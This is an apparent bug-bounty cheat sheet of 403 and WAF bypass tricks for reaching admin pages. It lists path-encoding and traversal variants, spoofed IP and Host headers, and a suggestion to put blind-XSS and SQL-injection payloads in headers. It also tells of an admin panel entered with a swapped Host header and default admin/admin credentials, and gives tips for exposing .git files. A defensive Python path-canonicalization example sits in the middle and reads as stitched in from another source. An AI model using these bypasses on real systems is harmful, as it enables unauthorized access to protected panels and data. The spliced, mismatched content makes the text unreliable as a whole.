💯WAF or Cloudflare Bypass

-------------------------------------------------------------

Bypass 403 Error

-------------------------------------------------------------

Simple Ways to Bypass 403 and Access /admin

  1. Using Space Symbols

website/admin%20

website/admin%09

website/%2e/path

website/admin/.

website//admin//

website/./admin/..

website/;/admin

website/.;/admin

website/./admin/./

website/admin/..;/

website/admin..;/

website//;//admin

-------------------------------------------------------------

  2. Using Traversal tricks:

website/admin/..;/

website/static../admin.json

website/admin/api/..;/..;/admin/

-------------------------------------------------------------

  3. Using Header Bypass:

X-Forwarded-For: Put BXSS and SQLI Payloads

X-Custom-Ip-Authorization: 127.0.0.1

X-Original-URL: /admin

X-Rewrite-URL: /admin

X-Real-IP:127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-Client-IP: 127.0.0.1

Content-Type: XML

Content-Type: application/XML

-------------------------------------------------------------

  4. Using HOST Header Bypass:

Host: google.com

Host: localhost

Host: 127.0.0.1

Host: 127.1

-------------------------------------------------------------

  5. Using Parameter Pollution Bypass:

website/admin/panel ---> 403

website/admin/monitor ---> 200

Then: website/admin/monitor/;panel ---> 200

-------------------------------------------------------------

  6. Try uppercasing letters in the URL:

website/aDmIN
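As an added defensive illustration (not code from the original page), the following Python shows why a 403 rule that matches the raw request path misses the space, traversal, `;` and letter-case variants listed above, and why the allow/deny decision has to be made on the canonical path instead. The normalization steps are assumptions about how a typical backend router resolves a path (percent-decoding, ignoring `;` path parameters, collapsing slashes and `..`, case-insensitive routes); `PROTECTED_PREFIX` and the sample paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical protected area used for this illustration.
PROTECTED_PREFIX = "/admin"

def naive_is_protected(raw_path: str) -> bool:
    """The weak rule: prefix match on the path exactly as it arrives on the wire."""
    return raw_path == PROTECTED_PREFIX or raw_path.startswith(PROTECTED_PREFIX + "/")

def canonicalize(raw_path: str) -> str:
    """Reduce a request path to the form the backend router will most likely act on.

    Assumed backend behaviour: percent-decode, ignore ';' path parameters, collapse
    duplicate slashes, resolve '.'/'..', trim trailing blanks, match routes
    case-insensitively. Folding all of these makes the access check fail closed.
    """
    path = raw_path
    # Decode until a fixed point so double-encoded sequences (%252e) also collapse.
    decoded = unquote(path)
    while decoded != path:
        path, decoded = decoded, unquote(decoded)
    # Drop ';param' suffixes per segment, so '..;' becomes '..' and ';' alone becomes ''.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    # Collapse all leading slashes to one; posixpath.normpath would keep exactly two.
    path = "/" + path.lstrip("/")
    # Resolve '/./', '/../' and repeated slashes the way a filesystem-backed router does.
    path = posixpath.normpath(path)
    # Trailing space/tab (from %20 / %09) and letter case are not route-significant.
    return path.rstrip(" \t").lower()

def canonical_is_protected(raw_path: str) -> bool:
    """The hardened rule: the same prefix test, but applied to the canonical path."""
    canon = canonicalize(raw_path)
    return canon == PROTECTED_PREFIX or canon.startswith(PROTECTED_PREFIX + "/")

# Constructed inputs: variants from this page plus one legitimate unrelated path.
SAMPLE_PATHS = [
    "/admin%20", "/admin%09", "/admin/.", "//admin//", "/;/admin", "/.;/admin",
    "/./admin/./", "//;//admin", "/aDmIN", "/admin/api/..;/..;/admin/", "/administrator",
]

def compare(paths=SAMPLE_PATHS) -> dict:
    """Map each path to (naive verdict, canonical verdict) so the gap is visible."""
    return {p: (naive_is_protected(p), canonical_is_protected(p)) for p in paths}

if __name__ == "__main__":
    for p, (naive, canon) in compare().items():
        print(f"{p:32} naive={naive!s:5} canonical={canon}")
```

Running it prints one row per variant; every row where `naive` is False and `canonical` is True is a request the raw-path rule would have waved through to the protected handler.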

-------------------------------------------------------------

Unicode Text Converter

https://qaz.wtf/u/convert.cgi

-------------------------------------------------------------

403 Bypass

Steps to Reproduce (According to Report):

Navigate to "https://redacted.com/admin" (gives a 403 error). Then intercept that request with the help of Burp Suite. After intercepting that request, simply change the Host header value from redacted.com to google.com & hit Go. You will find that the server does not validate that request properly. It simply opens up an admin panel login page. Now the error changes from 403 Forbidden to 200 OK (bypassing done). But now I don't have the right credentials to get access to the admin panel. Luckily I tried 'admin' as a username and 'admin' as a password. Got success.

-------------------------------------------------------------

Mostly I try fuzzing and 403 bypasses:

  • Fuzzing /.git/FUZZ (use custom .git wordlist)

  • 403 Bypass /.git => 403

  • /.git/config/ => 200

  • /.git/config/* => 200